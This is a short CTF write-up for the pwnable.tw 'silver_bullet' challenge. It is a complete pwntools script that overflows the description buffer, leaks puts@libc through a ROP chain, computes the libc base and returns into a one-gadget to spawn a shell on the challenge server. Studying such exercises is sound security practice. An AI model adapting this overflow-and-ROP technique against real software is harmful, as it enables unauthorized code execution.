
[pwnable.tw] silver_bullet write-up

ba0bab 2018. 9. 29. 01:29
from pwn import *



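s = remote("chall.pwnable.tw", 10103)
e = ELF("./silver_bullet")
libc = ELF("./libc_32.so.6")
context.log_level = 'debug'

# Fixed addresses inside the (non-PIE) 32-bit binary and the matching libc.
# They come from the original write-up and are specific to this build of
# silver_bullet / libc_32.so.6 -- re-derive them if either file changes.
pr = 0x08048475               # one-pop + ret gadget: discards puts()'s argument after the leak call
RET_AFTER_LEAK = 0x08048954   # where the leak chain returns so the bug can be hit again
                              # (presumably main's menu loop -- verify in the disassembly)
ONE_GADGET_OFF = 0x3a819      # one-gadget offset in libc_32.so.6 (check its constraints with one_gadget)

# Layout the payloads rely on: a 47-byte description plus one byte from the
# first power-up fill the description buffer, so the second power-up writes
# past it.  Seven 0xff bytes then cover everything between the end of the
# buffer and the saved return address (offsets taken from the write-up --
# NOTE(review): confirm against the bullet struct / stack frame if they drift).
DESC_LEN = 47
PAD_TO_RET = b"\xff" * 7


def _create_bullet(desc):
    """Menu option 1: create a bullet whose description is `desc` (bytes)."""
    s.recvuntil(b":")
    s.sendline(b"1")
    s.recvuntil(b":")
    s.sendline(desc)


def _power_up(data, newline=False):
    """Menu option 2: append `data` (bytes) to the current bullet's description.

    With newline=False the data goes out via send(), so the program reads
    exactly len(data) bytes; the first power-up needs that to land on the
    48th byte and nothing more.
    """
    s.recvuntil(b"choice :")
    s.sendline(b"2")
    s.recvuntil(b":")
    if newline:
        s.sendline(data)
    else:
        s.send(data)


def _beat():
    """Menu option 3: use the bullet; the overwritten return address takes effect afterwards."""
    s.recvuntil(b"choice :")
    s.sendline(b"3")


def _overflow_ret(chain):
    """Drive create / power-up / power-up / beat so that `chain` (packed
    addresses, bytes) ends up on the saved return address."""
    _create_bullet(b"A" * DESC_LEN)
    _power_up(b"a")                               # 48th byte: fills the buffer
    _power_up(PAD_TO_RET + chain, newline=True)   # spills over the return address
    _beat()


# Stage 1: leak puts@libc with puts(puts@got), then return into the program so
# the same overflow can be used a second time now that libc's base is known.
leak_chain = p32(e.plt['puts']) + p32(pr) + p32(e.got['puts']) + p32(RET_AFTER_LEAK)
_overflow_ret(leak_chain)

s.recvuntil(b"!!\n")
# recvn(4) blocks for exactly four bytes; recv(4) could hand back fewer on a
# split read and silently corrupt the leak.
libc_leak = u32(s.recvn(4))
log.success(hex(libc_leak))
base = libc_leak - libc.symbols['puts']
log.success(hex(base))
magic = base + ONE_GADGET_OFF
log.success(hex(magic))

# Stage 2: same overflow, returning straight into the one-gadget.
_overflow_ret(p32(magic))

s.interactive()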